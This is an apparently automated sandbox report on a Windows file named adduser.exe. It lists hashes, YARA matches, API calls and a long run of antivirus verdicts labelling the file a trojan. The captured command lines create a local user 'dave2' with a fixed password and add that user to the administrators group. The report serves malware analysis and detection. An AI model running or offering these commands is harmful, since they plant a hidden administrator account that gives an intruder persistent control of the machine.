Summary | ZeroBOX

adduser.exe

PE64 PE File
Category FILE
Machine s1_win7_x6401
Started May 17, 2024, 9:36 a.m.
Completed May 17, 2024, 9:57 a.m.
Size 112.2KB
Type PE32+ executable (console) x86-64, for MS Windows
MD5 510f4e20d3a6e15ac818d7e667bbf300
SHA256 a678904fe3015f3590aa26ec33ee4f19d26f2369bc462991915754cad2f966f4
CRC32 6DC28C9D
ssdeep 1536:wV8k1S+t3NIkzwIUZjwZpXcB4YchVvW0InAcngugNamOHvkE+zhtWba:05lFNIVC9Du/Fba
Yara
  • IsPE64 - (no description)
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: The command completed successfully.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: The command completed successfully.
console_handle: 0x0000000000000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
cmdline C:\Windows\system32\cmd.exe /c net user dave2 password123! /add
cmdline C:\Windows\system32\cmd.exe /c net localgroup administrators dave2 /add
cmdline net localgroup administrators dave2 /add
cmdline net user dave2 password123! /add
Lionic Trojan.Win32.Generic.4!c
Skyhigh RDN/Generic.grp
ALYac Trojan.GenericKD.71626492
Cylance unsafe
VIPRE Trojan.GenericKD.71626492
Sangfor Trojan.Win32.Agent.Vf3s
K7AntiVirus Riskware ( 00584baa1 )
BitDefender Trojan.GenericKD.71626492
K7GW Riskware ( 00584baa1 )
Arcabit Trojan.Generic.D444EEFC
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Generik.NBNLNLF
APEX Malicious
McAfee RDN/Generic.grp
Avast Win64:TrojanX-gen [Trj]
Kaspersky UDS:DangerousObject.Multi.Generic
MicroWorld-eScan Trojan.GenericKD.71626492
Rising Trojan.Znyonm!8.18A3A (CLOUD)
Emsisoft Trojan.GenericKD.71626492 (B)
TrendMicro TROJ_FRS.VSNTA124
FireEye Trojan.GenericKD.71626492
Sophos Mal/Generic-S
Ikarus Trojan.Win64.Rozena
Google Detected
MAX malware (ai score=88)
Antiy-AVL GrayWare/Win32.Wacapew
Kingsoft Win32.Troj.Unknown.a
Microsoft Trojan:Win32/Wacatac.B!ml
ViRobot Trojan.Win.Z.Agent.114898
ZoneAlarm UDS:DangerousObject.Multi.Generic
GData Trojan.GenericKD.71626492
Varist W64/ABTrojan.KIOI-0498
AhnLab-V3 Trojan/Win.Trojan-gen.R589795
DeepInstinct MALICIOUS
Malwarebytes Malware.AI.4151060143
Panda Trj/Chgt.AD
TrendMicro-HouseCall TROJ_FRS.VSNTA124
Yandex Trojan.Agent!R0CcgENdDK0
Fortinet W32/PossibleThreat
AVG Win64:TrojanX-gen [Trj]
Paloalto generic.ml
alibabacloud Trojan:Win/Generik.NKSMKO3